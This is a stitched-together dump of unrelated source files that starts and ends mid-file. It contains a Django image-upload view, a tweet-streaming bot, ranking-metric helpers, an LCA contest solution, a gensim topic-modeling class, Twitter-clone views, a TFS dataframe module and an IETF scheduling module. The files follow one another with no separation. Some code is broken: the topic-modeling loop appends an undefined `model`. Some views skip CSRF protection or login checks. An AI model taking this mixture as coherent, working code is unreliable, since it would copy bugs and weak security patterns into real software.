'', 'success': False, 'msg': '上传失败,已超出图片最大限制!'} return JsonResponse(retdata) backend = image_processing.get_backend() if not getattr(settings, 'SIMDITOR_ALLOW_NONIMAGE_FILES', True): try: backend.image_verify(uploaded_file) except utils.NotAnImageException: retdata = {'file_path': '', 'success': False, 'msg': '图片格式错误!'} return JsonResponse(retdata) filename = get_upload_filename(uploaded_file.name) saved_path = default_storage.save(filename, uploaded_file) url = utils.get_media_url(saved_path) is_api = settings.SIMDITOR_CONFIGS.get('is_api', False) url = request.META.get('HTTP_ORIGIN') + url if is_api else url retdata = {'file_path': url, 'success': True, 'msg': '上传成功!'} return JsonResponse(retdata) class ImageUploadView(generic.View): """ImageUploadView.""" http_method_names = ['post'] def post(self, request, **kwargs): """Post.""" return upload_handler(request) UPLOAD = csrf_exempt(ImageUploadView.as_view()) <reponame>wnjnz/tweetbot from twython import TwythonStreamer from auth import ( consumer_key, consumer_secret, access_token, access_token_secret ) class MyStreamer(TwythonStreamer): def on_success(self, data): if 'text' in data: username = data['user']['screen_name'] tweet = data['text'] print("@{}: {}".format(username, tweet)) stream = MyStreamer( consumer_key, consumer_secret, access_token, access_token_secret ) stream.statuses.filter(track='#innovation') """ ** deeplean-ai.com ** ** dl-lab ** created by :: GauravBh1010tt """ from __future__ import division from operator import itemgetter from collections import defaultdict import scipy.stats as measures import numpy as np ###################### CALCULATING MRR [RETURNS MRR VALUE] ###################### def mrr(out, th = 10): n = len(out) MRR = 0.0 for qid in out: candidates = out[qid] for i in xrange(min(th, len(candidates))): if candidates[i] == "true": MRR += 1.0 / (i + 1) break return MRR * 100.0 / n ###################### CALCULATING MAP [RETURNS MAP VALUE] ###################### def map(out, th): num_queries = len(out) MAP = 0.0 for qid in out: candidates = out[qid] avg_prec = 0 precisions = [] num_correct = 0 for i in xrange(min(th, len(candidates))): if candidates[i] == "true": num_correct += 1 precisions.append(num_correct/(i+1)) if precisions: avg_prec = sum(precisions)/len(precisions) MAP += avg_prec return MAP / num_queries ###################### QUESTION LIST TO DICTIONARY [RETURNS DICTIONARY OF LISTS] ###################### def list2dict(lst): interm = defaultdict(list) new_pred = defaultdict(list) for i in range(len(lst)): interm[i+1] = lst[i] for qid in interm: interm[qid] = sorted(interm[qid], key = itemgetter(0), reverse = True) val = [rel for score, rel in interm[qid]] if 'true' in val: new_pred[qid] = val else: continue return new_pred ###################### READING FILE [RETURNS LIST OF LISTS] ###################### def readfile(pred_fname): pred = open(pred_fname).readlines() pred = [line.split('\t') for line in pred] ques = [] ans = [] i = 1 while i != len(pred): if pred[i][0] == pred[i-1][0]: ans.append([float(pred[i-1][-2]), pred[i-1][-1][0:-1]]) else: ans.append([float(pred[i-1][-2]), pred[i-1][-1][0:-1]]) ques.append(ans) ans = [] i += 1 ans.append([float(pred[i-1][-2]), pred[i-1][-1][0:-1]]) ques.append(ans) return ques ###################### MAP AND MRR FUNCTION [RETURNS MAP AND MRR VALUES] ###################### def map_mrr(pred_fname, th = 10): ques = readfile(pred_fname) dic = list2dict(ques) return map(dic,th), mrr(dic,th) def eval_metric(lrmodel, X_test_l, X_test_r, res_fname,pred_fname,use_softmax=True, feat_test=None): if feat_test!=None: pred = lrmodel.predict([X_test_l, X_test_r, feat_test])[:,1] else: pred = lrmodel.predict([X_test_l, X_test_r])[:,1] ################### SAVING PREDICTIONS ################### f1 = open(res_fname, 'r').readlines() f2 = open(pred_fname,'w') for j,line in enumerate(f1): line = line.split('\t') #val = [line[0]+'\t',line[1]+'\t',line[2]+'\t',str(pred[j][0])+'\t',line[-1]] if use_softmax: val = [line[0]+'\t',line[1]+'\t',line[2]+'\t',str(pred[j])+'\t',line[-1]] else: val = [line[0]+'\t',line[1]+'\t',line[2]+'\t',str(pred[j][0])+'\t',line[-1]] f2.writelines(val) f2.close() ################### PRINTING AND SAVING MAP-MRR VALUES ################### map_val, mrr_val = map_mrr(pred_fname) #print 'MAP:', map_val #print 'MRR:', mrr_val return map_val, mrr_val def eval_sick(model,X_test_l,X_test_r,test_score): #r = np.arange(1,6) pred = model.predict([X_test_l,X_test_r])*4+1 pred = [i[0] for i in pred] pred = np.array(pred) test_score = np.array(test_score)*4+1 sp_coef = measures.spearmanr(pred,test_score)[0] per_coef = measures.pearsonr(pred,test_score)[0] mse_coef = np.mean(np.square(pred-test_score)) return sp_coef, per_coef, mse_coef<reponame>NULLCT/LOMC<filename>src/data/904.py # author: Taichicchi # created: 10.07.2021 21:13:51 import sys sys.setrecursionlimit(10**6) N, Q = map(int, input().split()) G = [[] for _ in range(N)] for i in range(N - 1): a, b = map(lambda x: int(x) - 1, input().split()) G[a].append(b) G[b].append(a) def EulerTour(to, root=0): n = len(to) depth = [-1] * n depth[root] = 0 first_visit_index = [-1] * n res = [] stack = [(root, 0)] while stack: u, i = stack.pop() if i == 0: first_visit_index[u] = len(res) res.append(u) if i < len(to[u]): v = to[u][i] stack.append((u, i + 1)) if depth[v] == -1: depth[v] = depth[u] + 1 stack.append((v, 0)) else: res.pop() return res, first_visit_index, depth class SparseTableMin: def __init__(self, aa): w = len(aa) h = w.bit_length() table = [aa] + [[-1] * w for _ in range(h - 1)] tablei1 = table[0] for i in range(1, h): tablei = table[i] for j in range(w - (1 << i) + 1): rj = j + (1 << (i - 1)) tablei[j] = min(tablei1[j], tablei1[rj]) tablei1 = tablei self.table = table # [l,r)の最小値 def min(self, l, r): i = (r - l).bit_length() - 1 tablei = self.table[i] Lmin = tablei[l] Rmin = tablei[r - (1 << i)] if Lmin < Rmin: Rmin = Lmin return Rmin # intにしてから1引く関数。頂点の入力に使う def int1(x): return int(x) - 1 # et...オイラーツアーの頂点順 # fi...頂点がオイラーツアーで最初に現れるindex # dep...頂点の深さ et, fi, dep = EulerTour(G) # オイラーツアーに対応させた深さのリストをスパーステーブルに渡す sp = SparseTableMin([dep[u] for u in et]) for _ in range(Q): c, d = map(lambda x: int(x) - 1, input().split()) q = sp.min(c, d) dist = 1 + dep[c] + dep[d] - 2 * dep[q] print("Town" if dist % 2 == 1 else "Road") # -*- coding: utf-8 -*- """ Created on Wed Mar 25 11:24:51 2020 @author: <NAME> @project: Classe que trata o topic modeling """ from spacy.tokens import Doc import numpy from spacy.attrs import LOWER, POS, ENT_TYPE, IS_ALPHA from neo4j import GraphDatabase import pandas as pd import os #import subprocess #import requests #import unidecode import re import csv from acessos import get_conn, read, persistir_banco, persistir_multiplas_linhas import sys import re, numpy as np, pandas as pd from pprint import pprint import spacy # Gensim import gensim from gensim import corpora, models, similarities import gensim, spacy, logging, warnings import gensim.corpora as corpora from gensim.utils import lemmatize, simple_preprocess from gensim.models import CoherenceModel import matplotlib.pyplot as plt from gensim import corpora, models, similarities # NLTK Stop words from nltk.corpus import stopwords from acessos import read, get_conn, persistir_uma_linha, persistir_multiplas_linhas, replace_df from gensim.models.ldamulticore import LdaMulticore import seaborn as sns import matplotlib.colors as mcolors #%matplotlib inline warnings.filterwarnings("ignore",category=DeprecationWarning) logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.ERROR) import os import warnings warnings.filterwarnings("ignore",category=DeprecationWarning) from gensim.test.utils import datapath class Topic_Modeling: def __init__(self, language="pt-br", stop_words_list=[]): self.language = language self.stop_words = self._load_stop_words(stop_words_list) self.nlp = self._load_spacy() self.model_list =[] self.coherence_values = [] self.lista_num_topics = [] self.melhor_modelo = None def _load_spacy(self): '''metodo privado que retorna o modelo do spacy baseado no idioma''' #disable_list = ['parser', 'ner'] disable_list = [] if self.language == "pt-br": nlp = spacy.load('pt_core_news_lg', disable=disable_list) elif self.language == "us-en": nlp = spacy.load("en_core_web_sm", disable=disable_list) return nlp def _load_stop_words(self, stop_words_list=[]): '''metodo privado que retorna as stop words baseado no idioma''' if self.language == "pt-br": stop_words = stopwords.words('portuguese') stop_words.extend(stop_words_list) elif self.language == "us-en": stop_words = stopwords.words('english') #Testar stop_words.extend(['from', 'subject', 're', 'edu', 'use', 'not', 'would', 'say', 'could', '_', 'be', 'know', 'good', 'go', 'get', 'do', 'done', 'try', 'many', 'some', 'nice', 'thank', 'think', 'see', 'rather', 'easy', 'easily', 'lot', 'lack', 'make', 'want', 'seem', 'run', 'need', 'even', 'right', 'line', 'even', 'also', 'may', 'take', 'come']) stop_words.extend(stop_words_list) return stop_words def filtrar_pos_tag(self, texto, allowed_postags=["NOUN", "PROPN", "VERB", "ADJ"]): texto_saida = "" doc = self.nlp(texto) for token in doc: if token.pos_ in allowed_postags: texto_saida += " {}".format(token) return texto_saida def replace_ner_por_label(self, texto): texto_out = texto doc = self.nlp(texto) for ent in reversed(doc.ents): #label = " _" + ent.label_ + "_ " label = ent.label_ comeco = ent.start_char fim = comeco + len(ent.text) texto_out = texto_out [:comeco] + label + texto_out[fim:] return texto_out def processamento_inicial(self, lista_documentos): '''remove emails, quebra de linhas e single quotes''' #Tratando abreviações lista_documentos = [re.sub('neh', 'né', sent) for sent in lista_documentos] lista_documentos = [re.sub('td', 'tudo', sent) for sent in lista_documentos] lista_documentos = [re.sub('tds', 'todos', sent) for sent in lista_documentos] lista_documentos = [re.sub('vc', 'você', sent) for sent in lista_documentos] lista_documentos = [re.sub('vcs', 'vocês', sent) for sent in lista_documentos] lista_documentos = [re.sub('voce', 'você', sent) for sent in lista_documentos] lista_documentos = [re.sub('tbm', 'também', sent) for sent in lista_documentos] # Remove Emails lista_documentos = [re.sub('\S*@\S*\s?', '', sent) for sent in lista_documentos] # Remove new line characters lista_documentos = [re.sub('\s+', ' ', sent) for sent in lista_documentos] # Remove distracting single quotes lista_documentos = [re.sub("\'", "", sent) for sent in lista_documentos] return lista_documentos def sent_to_words(self, sentences): '''tokeniza um unico documento''' for sentence in sentences: yield(gensim.utils.simple_preprocess(str(sentence), deacc=False)) # deacc=True removes punctuations def tokenizar(self, lista_documentos): '''tokeniza uma lista de documentos''' lista_documentos_tokenizado = list(self.sent_to_words(lista_documentos)) return lista_documentos_tokenizado def montar_n_grams(self, lista_documentos_tokenizado): '''monta bi_grams e tri_grams de uma lista de documentos tokenizado utilizar este metodo depois de remover stop words''' bigram = gensim.models.Phrases(lista_documentos_tokenizado, min_count=5, threshold=100) # higher threshold fewer phrases. trigram = gensim.models.Phrases(bigram[lista_documentos_tokenizado], threshold=100) # Faster way to get a sentence clubbed as a trigram/bigram bigram_mod = gensim.models.phrases.Phraser(bigram) trigram_mod = gensim.models.phrases.Phraser(trigram) #retorna lista bigram e trigram self.bigram = [bigram_mod[doc] for doc in lista_documentos_tokenizado] self.trigram = [trigram_mod[bigram_mod[doc]] for doc in lista_documentos_tokenizado] return self.bigram , self.trigram def get_n_grams(self): return self.bigram , self.trigram def lematizar_documentos(self, lista_documentos_tokenizado): """https://spacy.io/api/annotation""" documentos_out = [] for sent in lista_documentos_tokenizado: doc = self.nlp(" ".join(sent)) lista_tokens_lematizados = [] for token in doc : lista_tokens_lematizados.append(token.lemma_) documentos_out.append(lista_tokens_lematizados) return documentos_out def remover_stop_words(self, lista_documentos_tokenizado): return [[word for word in simple_preprocess(str(doc)) if word not in self.stop_words] for doc in lista_documentos_tokenizado] def montar_novo_corpus(self, nova_lista_documentos_lematizada, id2word): print(id2word) corpus = [id2word.doc2bow(text) for text in nova_lista_documentos_lematizada] return corpus def pre_processar_texto_ou_lista(self, texto_ou_lista, filtro_ner=True, allowed_postags=["NOUN","PROPN", "VERB", "ADJ"]): if isinstance(texto_ou_lista, str): lista_documentos = [texto_ou_lista] else: lista_documentos = texto_ou_lista lista_documentos = self.processamento_inicial(lista_documentos) if filtro_ner==True: lista_documentos = [self.replace_ner_por_label(texto) for texto in lista_documentos] # if filtro_pos_tag==True: # lista_documentos = [self.filtrar_pos_tag(texto) for texto in lista_documentos] lista_documentos = [self.filtrar_pos_tag(texto, allowed_postags) for texto in lista_documentos] lista_documentos_tokenizado = self.tokenizar(lista_documentos) lista_documentos_tokenizado_stop_words = self.remover_stop_words(lista_documentos_tokenizado) lista_documento_bi_gram, lista_documento_tri_gram = self.montar_n_grams(lista_documentos_tokenizado_stop_words) lista_documento_lematizada = self.lematizar_documentos(lista_documento_tri_gram) #lista_documento_lematizada = lista_documento_bi_gram return lista_documento_lematizada def gerar_modelo_hdp(self, corpus, id2word, texts): model_hdp = models.HdpModel(corpus, id2word=id2word) coherencemodel = CoherenceModel(model=model_hdp, texts=texts, dictionary=id2word, coherence='c_v') self.melhor_modelo = model_hdp return model_hdp, coherencemodel.get_coherence() def gerar_multiplos_modelos(self, id2word, corpus, texts, limit, start=2, step=3): print("Start: {}".format(start)) print("limit: {}".format(limit)) print("Step: {}".format(step)) self.start = start self.limit = limit self.step = step coherence_values = [] model_list = [] for num_topics in range(start, limit, step): print("Gerando novo modelo...") # model = gensim.models.ldamodel.LdaModel(corpus=corpus, # id2word=id2word, # num_topics=num_topics, # random_state=100, # update_every=1, # chunksize=100, # passes=10, # alpha='auto', # per_word_topics=True) lda = LdaMulticore(corpus=corpus, id2word=id2word, random_state=100, num_topics=num_topics, workers=3) model_list.append(model) coherencemodel = CoherenceModel(model=model, texts=texts, dictionary=id2word, coherence='c_v') coherence_values.append(coherencemodel.get_coherence()) self.lista_num_topics.append(num_topics) self.model_list = model_list self.coherence_values = coherence_values return model_list, coherence_values def plotar_coerencia(self): x = range(self.start, self.limit, self.step) plt.plot(x, self.coherence_values) plt.xlabel("Num de Tópicos") plt.ylabel("Coherence score") plt.legend(("coherence_values"), loc='best') plt.show() for m, cv in zip(x, self.coherence_values): print("Num de Tópicos =", m, " valor coerência: ", round(cv, 4)) def classificar_novo_texto(self, texto, model,id2word): lista_lematizada = self.pre_processar_texto_ou_lista(texto) novo_corpus = self.montar_novo_corpus(lista_lematizada,id2word) doc_bow = novo_corpus[0] topicos = model[doc_bow] #topicos_ordenados = sorted(topicos[0], key=lambda x: x[1], reverse=True) topicos_ordenados = sorted(topicos, key=lambda x: x[1], reverse=True) melhor_topico = topicos_ordenados[0] #print(topicos_ordenados) return melhor_topico, topicos_ordenados def montar_id2word(self, lista_documento_lematizada): id2word = corpora.Dictionary(lista_documento_lematizada) return id2word def montar_dict_models(self): dict_models = { "modelo": self.model_list, "coerencia":self.coherence_values, "num_topics": self.lista_num_topics } return dict_models def salvar_modelos(self, diretorio, folder_name): dict_models = self.montar_dict_models() df_models = pd.DataFrame(dict_models) folder_name = "{}\\{}".format(diretorio,folder_name) try: os.mkdir(folder_name) except OSError: print ("Erro na criação da pasta") return "erro" df_models['caminho'] = df_models.apply(lambda x: "{}\\#_{}".format(folder_name, str(x['num_topics'])), axis=1) for row in df_models.iterrows(): row[1]['modelo'].save(row[1]['caminho']) df_models.drop(['modelo'], axis=1, inplace=True) dict_models = df_models.to_dict("records") return dict_models def retornar_melhor_modelo(self): dict_models = self.montar_dict_models() df_models = pd.DataFrame(dict_models) self.melhor_modelo = df_models.sort_values(by=['coerencia'], ascending=False).iloc[0]['modelo'] melhor_coerencia = df_models.sort_values(by=['coerencia'], ascending=False).iloc[0]['coerencia'] num_topicos = df_models.sort_values(by=['coerencia'], ascending=False).iloc[0]['num_topics'] return self.melhor_modelo, melhor_coerencia, num_topicos def retornar_top_key_words(self, modelo, num_palavras=30): dict_palavras_topicos = {} for index, topic in modelo.show_topics(num_topics=-1,num_words=num_palavras,formatted=False): dict_words = {} for i, palavra in enumerate(topic,start=1): dict_words["palavra_{}".format(i)] = palavra[0] dict_words["prob_{}".format(i)] = float(palavra[1]) #print("Palavra: {} - Peso: {}".format(palavra[0],palavra[1])) dict_words["topico"] = index dict_palavras_topicos["topico_"+str(index)] = dict_words df_palavras = pd.DataFrame.from_dict(dict_palavras_topicos, orient='index') return df_palavras, dict_palavras_topicos def persistir_objeto_mongo(self, dict_dados): dict_dados['lista_coerencia'] = self.coherence_values dict_dados['palavras_melhor_modelo'] def processar_df_topicos_probabilidade(self, df): '''busca os 4 principais tópicos e salva em colunas''' df['topico_1'] = df.apply(lambda x: x['lista_topicos'][0][0] ,axis=1) df['prob_1'] = df.apply(lambda x: x['lista_topicos'][0][1] ,axis=1) try: df['topico_2'] = df.apply(lambda x: int(x['lista_topicos'][1][0]) if len(x['lista_topicos']) > 1 else None ,axis=1) df['prob_2'] = df.apply(lambda x: float(x['lista_topicos'][1][1]) if len(x['lista_topicos']) > 1 else None ,axis=1) except: df['topico_2'] = None df['prob_2'] = None try: df['topico_3'] = df.apply(lambda x: int(x['lista_topicos'][2][0]) if len(x['lista_topicos']) > 2 else None ,axis=1) df['prob_3'] = df.apply(lambda x: float(x['lista_topicos'][2][1]) if len(x['lista_topicos']) > 2 else None ,axis=1) except: df['topico_3'] = None df['prob_3'] = None try: df['topico_4'] = df.apply(lambda x: int(x['lista_topicos'][3][0]) if len(x['lista_topicos']) > 3 else None ,axis=1) df['prob_4'] = df.apply(lambda x: float(x['lista_topicos'][3][1]) if len(x['lista_topicos']) > 3 else None ,axis=1) except: df['topico_4'] = None df['prob_4'] = None return df# -*- coding: utf-8 -*- from django.urls import path from lgr_idn_table_review.idn_icann.views import IdnTableIcannModeView, IdnTableIcannListReports urlpatterns = [ path('', IdnTableIcannModeView.as_view(), name='lgr_idn_icann_mode'), path('report/<str:folder>', IdnTableIcannListReports.as_view(), name='lgr_idn_icann_reports'), ] from django.shortcuts import redirect, render from django.contrib.auth.decorators import login_required from .models import TwitterUser from django.template import RequestContext # Create your views here. @login_required def homepage(request): return render(request, 'index.html', {}) def user_detail(request, user_id): requested_user = TwitterUser.objects.get(id=user_id) return requested_user def following(request, user_id): user = TwitterUser.objects.get(id=user_id) following = len(user.following.all()) return following def follow(request, user_id): id = request.user.id editable = TwitterUser.objects.get(id=id) if request.method == 'GET': if request.user != user_id: editable.following.add(TwitterUser.objects.get(id=user_id)) editable.save() return render(request, 'index.html', {}) def unfollow(request, user_id): id = request.user.id editable = TwitterUser.objects.get(id=id) if request.method == 'GET': if request.user != user_id: editable.following.remove(TwitterUser.objects.get(id=user_id)) editable.save() return render(request, 'index.html', {}) """ Fixed Dataframe ----------------------- This classes allow you to pre-define your dataframes and only allow specific columns and headers. :Example: .. sourcecode:: python class KickTfs(FixedTfs): filename = "kick_{}.tfs" two_planes = True class Columns(FixedColumnCollection): NAME = FixedColumn("NAME", str) S = FixedColumn("S", float, "m") ALPHA = FixedColumn("ALF{}", float, "m") BETA = FixedColumn("BET{}", float, "m") class Headers(FixedColumnCollection): TITLE = FixedColumn("Title", str) TUNEX = FixedColumn("Q1", float) RESCALE = FixedColumn("RescaleFactor{}", float) Index = Columns.NAME kick_x = KickTfs(plane="X", directory="measurement_output") kick_x[kick_x.Columns.ALPHA] = calculate_alpha() # is equivalent to kick_x.ALFX = calculate_alpha() # the following will fail: kick_x["ALFY"] = calculate_alpha() # to write the file as kick_x.tfs into measurement_output: kick_x.write() # the class still has the old definitions stored KickTfs.Columns.ALPHA != kick_x.Columns.ALPHA # Getting a plane into the columns can be done at any level planed_columns = KickTfs.Columns("X") planed_columns.ALPHA == KickTfs.Columns.ALPHA("X") ``kick_x`` has now all columns defined, including their ``dtype``, which ensures successfull writing into a file. Otherwise ``kick_x`` will behave like a normal TfsDataFrame. The naming of the classes as ``Columns`` and ``Headers`` is important, as otherwise the definitions will not be found. Not including them will result in unrestricted DataFrames. :Issues: * If a lower-level function creating a new dataframe (e.g. ``append()`` or ``concat``) is called, the definitions might be lost. * Tricks can be used to temporarily create new columns and headers (e.g. writing to the headers object directly). It is in your hand to control for this once in a while by calling :meth:`FixedTfs.validate_definitions`. The dataframe is also checked before writing. """ import os from pathlib import Path from collections import defaultdict, OrderedDict, namedtuple from contextlib import suppress from typing import Union from tfs.handler import TfsDataFrame, read_tfs, write_tfs from tfs.tools import DotDict DEFAULTS = defaultdict(float, {int: 0, str: ""}) class FixedColumn(DotDict): """Class to define columns by name and dtype and possibly unit. The unit is not used internally so far, but might be useful for some applications. """ def __init__(self, name: str, dtype: type, unit: str = None): unit = "" if unit is None else unit super().__init__(dict(name=name, dtype=dtype, unit=unit)) def __str__(self): return self.name def __call__(self, plane): return FixedColumn(self.name.format(plane), self.dtype, self.unit) class FixedColumnCollection: """Abstract class to define TFS-Columns with name and Type. The columns are sorted into `names` and `types`, or as named-tuples in `columns`. Order of the properties is preserved since python 3.6 (see: https://stackoverflow.com/a/36060212/5609590 https://docs.python.org/3.6/whatsnew/3.6.html#whatsnew36-pep520 ) """ def __init__(self, plane: str = None, exclude: FixedColumn = None): type_and_unit = namedtuple("type_and_unit", ["dtype", "unit"]) self.plane = "" if plane is None else plane exclude = [] if exclude is None else exclude columns = [ col for col in type(self).__dict__.items() if isinstance(col[1], FixedColumn) and col[1] not in exclude ] self.mapping = OrderedDict() for attribute, column in columns: new_column = column(plane) setattr(self, attribute, new_column) # use same attributes but now 'planed' self.mapping[new_column.name] = type_and_unit( dtype=new_column.dtype, unit=new_column.unit ) self.names, (self.dtypes, self.units) = self.mapping.keys(), zip(*self.mapping.values()) def __iter__(self): return zip(self.names, self.dtypes, self.units) def __len__(self): return len(self.names) class FixedTfs(TfsDataFrame): """Abstract class to handle fixed TfsDataFrames. The final class needs to define filename, columns and headers. The instance directory and plane. """ filename = "" two_planes = True _initialized = False def __init__(self, plane: str = None, directory: Union[Path, str] = None, *args, **kwargs): super().__init__(*args, **kwargs) plane = "" if plane is None else plane directory = "" if directory is None else directory cls = type(self) self._directory = Path(directory) self._plane = plane if not cls.two_planes and len(plane): raise ValueError(f"{cls.__name__} is planeless, but a plane was defined.") self._filename = self._directory / cls.filename.format(plane) self.Columns = None with suppress(AttributeError, TypeError): self.Columns = cls.Columns(plane, exclude=[cls.Index]) self.Index = None with suppress(AttributeError, TypeError): self.Index = cls.Index(plane) self.Headers = None with suppress(AttributeError, TypeError): self.Headers = cls.Headers(plane) self._fill_missing_definitions() self.validate_definitions() self._initialized = True def __setitem__(self, key, value): try: return super().__setitem__(key, value) finally: if self._initialized and key in self.columns: for attribute in ("name", "dtype"): self._validate(attribute, "Columns", key) # Fill function -------------------- def _fill_missing_definitions(self): if self.Columns is not None: self._fill_missing_columns() if self.Headers is not None: self._fill_missing_headers() if self.Index is not None: self._fill_missing_index() # --- def _fill_missing_columns(self): for name, datatype, _ in self.Columns: if name not in self.columns: self[name] = DEFAULTS[datatype] self.reindex(self.Columns.names) self.astype({name: dtype for name, dtype, _ in self.Columns}, copy=False) def _fill_missing_headers(self): for name, datatype, _ in self.Headers: if name not in self.headers: self.headers[name] = DEFAULTS[datatype] new_headers = OrderedDict([(key, self.headers.pop(key)) for key in self.Headers.names]) new_headers.update(self.headers) # should be error, will raised in validation step! self.headers = new_headers def _fill_missing_index(self): self.index.name = self.Index.name self.index = self.index.astype(self.Index.dtype) # Validation -------------------- def _is_valid_name(self, kind, key) -> bool: if getattr(self, kind) is None: return True return key in getattr(self, kind).names def _is_valid_dtype(self, kind, key) -> bool: if getattr(self, kind) is None: return True check_type = getattr(self, kind).mapping[key].dtype try: dtype = self[key].dtype except AttributeError: return isinstance(self[key], check_type) if check_type == str and dtype == object: return True return dtype == check_type def _validate(self, attribute, kind, key=None): keys = getattr(self, kind.lower()) if key is None else [key] map_ = {"name": (self._is_valid_name, KeyError), "dtype": (self._is_valid_dtype, TypeError)} accepted, error = map_[attribute] invalid_name = [key for key in keys if not accepted(kind, key)] if len(invalid_name): raise error(f"Found invalid {kind} {attribute}s '{str(invalid_name)}'") def _validate_index_name(self): if self.Index is not None: if not self.index.name == self.Index.name: raise KeyError("Invalid index in DataFrame.") def _validate_index_type(self): if self.Index is not None and len(self.index) > 0: if not isinstance(self.index[0], self.Index.dtype): raise TypeError("Invalid index type in DataFrame.") def validate_definitions(self): """Validate the column, header and index present. """ for kind in ("Columns", "Headers"): for attribute in ("dtype", "name"): self._validate(attribute, kind) self._validate_index_name() self._validate_index_type() # IO Functions -------------------- def get_filename(self) -> Path: return self._filename def write(self) -> None: self.validate_definitions() write_tfs(self._filename, self, save_index=self.index.name) def read(self) -> "FixedTfs": return type(self)( self._plane, self._directory, read_tfs(self._filename, index=self.index.name) ) <filename>ietf/meeting/placement.py # FILE: ietf/meeting/placement.py # # Copyright (c) 2013, The IETF Trust. See ../../../LICENSE. # # This file contains a model that encapsulates the progress of the automatic placer. # Each step of placement is stored as a row in a table, not because this is necessary, # but because it helps to debug things. # # A production run of the placer would do the same work, but simply not save anything. # import sys from random import Random from datetime import datetime from django.db import models #from settings import BADNESS_UNPLACED, BADNESS_TOOSMALL_50, BADNESS_TOOSMALL_100, BADNESS_TOOBIG, BADNESS_MUCHTOOBIG #from ietf.meeting.models import Schedule, SchedTimeSessAssignment,TimeSlot,Room from ietf.meeting.models import SchedTimeSessAssignment from django.template.defaultfilters import slugify, date as date_format, time as time_format def do_prompt(): print "waiting:" sys.stdin.readline() class PlacementException(Exception): pass # ScheduleSlot really represents a single column of time. # The TimeSlot object would work here, but it associates a room. # There is a special Schedule slot (subclass) which corresponds to unscheduled items. class ScheduleSlot(object): def __init__(self, daytime): self.daytime = daytime self.badness = None self.slotgroups = {} # this is a partial copy of SchedTimeSessAssignment's methods. Prune later. #def __unicode__(self): # return u"%s [%s<->%s]" % (self.schedule, self.session, self.timeslot) # #def __str__(self): # return self.__unicode__() def add_assignment(self,fs): self.slotgroups[fs] = fs def scheduled_session_pk(self, assignments): things = [] slot1 = assignments.slot1 slot2 = assignments.slot2 for fs in self.slotgroups.iterkeys(): session = fs.session if slot1 is not None and fs == slot1: session = slot2.session if slot2 is not None and fs == slot2: session = slot1.session if session is not None: things.append((session.pk,fs)) return things def recalc_badness1(self, assignments): badness = 0 for fs,fs2 in self.slotgroups.iteritems(): if fs.session is not None: num = fs.session.badness2(self) #print "rc,,,,%s,%s,%u,recalc1" % (self.daytime, fs.session.short_name, num) badness += num self.badness = badness def recalc_badness(self, assignments): badness = 0 session_pk_list = self.scheduled_session_pk(assignments) #print "rc,,,%u,slot_recalc" % (len(session_pk_list)) for pk,fs in session_pk_list: #print "rc,,,,%u,%s,list" % (pk,fs.session) if fs.session is not None: num = fs.session.badness_fast(fs.timeslot, self, session_pk_list) #print "rc,,,,%s,%s,%u,recalc0" % (self.daytime, fs.session.short_name, num) badness += num self.badness = badness def calc_badness(self, assignments): if self.badness is None: self.recalc_badness(assignments) return self.badness # # this subclass does everything a ScheduleSlot does, in particular it knows how to # maintain and recalculate badness, but it also maintains a list of slots which # are unplaced so as to accelerate finding things to place at the beginning of automatic placement. # # XXX perhaps this should be in the form an iterator? # class UnplacedScheduleSlot(ScheduleSlot): def __init__(self): super(UnplacedScheduleSlot, self).__init__(None) self.unplaced_slot_numbers = [] self.unplaced_slots_finishcount = 0 def shuffle(self, generator): generator.shuffle(self.unplaced_slot_numbers) self.unplaced_slots_finishcount = self.count / 10 def finished(self): if len(self.unplaced_slot_numbers) <= self.unplaced_slots_finishcount: return True else: return False @property def count(self): return len(self.unplaced_slot_numbers) def add_assignment(self,fs): super(UnplacedScheduleSlot, self).add_assignment(fs) #print "unplaced add: %s" % (fs.available_slot) self.unplaced_slot_numbers.append(fs.available_slot) def get_unplaced_slot_number(self): #print "unplaced slots: %s" % (self.unplaced_slot_numbers) return self.unplaced_slot_numbers[0] def delete_first(self): del self.unplaced_slot_numbers[0] class FakeSchedTimeSessAssignment(object): """ This model provides a fake (not-backed by database) N:M relationship between Session and TimeSlot, but in this case TimeSlot is always None, because the Session is not scheduled. """ faked = "fake" def __init__(self, schedule): self.extendedfrom = None self.modified = None self.notes = None self.badness = None self.available_slot = None self.origss = None self.timeslot = None self.session = None self.schedule = schedule self.pinned = False self.scheduleslot = None def fromSchedTimeSessAssignment(self, ss): # or from another FakeSchedTimeSessAssignment self.session = ss.session self.schedule = ss.schedule self.timeslot = ss.timeslot self.modified = ss.modified self.pinned = ss.pinned self.origss = ss def save(self): pass # this is a partial copy of SchedTimeSessAssignment's methods. Prune later. def __unicode__(self): return u"%s [%s<->%s]" % (self.schedule, self.session, self.timeslot) def __str__(self): return self.__unicode__() @property def room_name(self): return "noroom" @property def special_agenda_note(self): return self.session.agenda_note if self.session else "" @property def acronym(self): if self.session and self.session.group: return self.session.group.acronym @property def slot_to_the_right(self): return None @property def acronym_name(self): if not self.session: return self.notes if hasattr(self, "interim"): return self.session.group.name + " (interim)" elif self.session.name: return self.session.name else: return self.session.group.name @property def session_name(self): return self.session.name @property def area(self): if not self.session or not self.session.group: return "" if self.session.group.type_id == "irtf": return "irtf" if self.timeslot.type_id == "plenary": return "1plenary" if not self.session.group.parent or not self.session.group.parent.type_id in ["area","irtf"]: return "" return self.session.group.parent.acronym @property def break_info(self): return None @property def area_name(self): if self.session and self.session.group and self.session.group.acronym == "edu": return "Training" elif not self.session or not self.session.group or not self.session.group.parent or not self.session.group.parent.type_id == "area": return "" return self.session.group.parent.name @property def isWG(self): if not self.session or not self.session.group: return False if self.session.group.type_id == "wg" and self.session.group.state_id != "bof": return True @property def group_type_str(self): if not self.session or not self.session.group: return "" if self.session.group and self.session.group.type_id == "wg": if self.session.group.state_id == "bof": return "BOF" else: return "WG" return "" @property def slottype(self): return "" @property def empty_str(self): # return JS happy value if self.session: return "False" else: return "True" def json_dict(self, selfurl): ss = dict() ss['assignment_id'] = self.id #ss['href'] = self.url(sitefqdn) ss['empty'] = self.empty_str ss['timeslot_id'] = self.timeslot.id if self.session: ss['session_id'] = self.session.id ss['room'] = slugify(self.timeslot.location) ss['roomtype'] = self.timeslot.type.slug ss["time"] = date_format(self.timeslot.time, 'Hi') ss["date"] = time_format(self.timeslot.time, 'Y-m-d') ss["domid"] = self.timeslot.js_identifier return ss # this object maintains the current state of the placement tool. # the assignments hash says where the sessions would go. class CurrentScheduleState: def __getitem__(self, key): if key in self.tempdict: return self.tempdict[key] return self.current_assignments[key] def __iter__(self): return self.current_assignments.__iter__() def 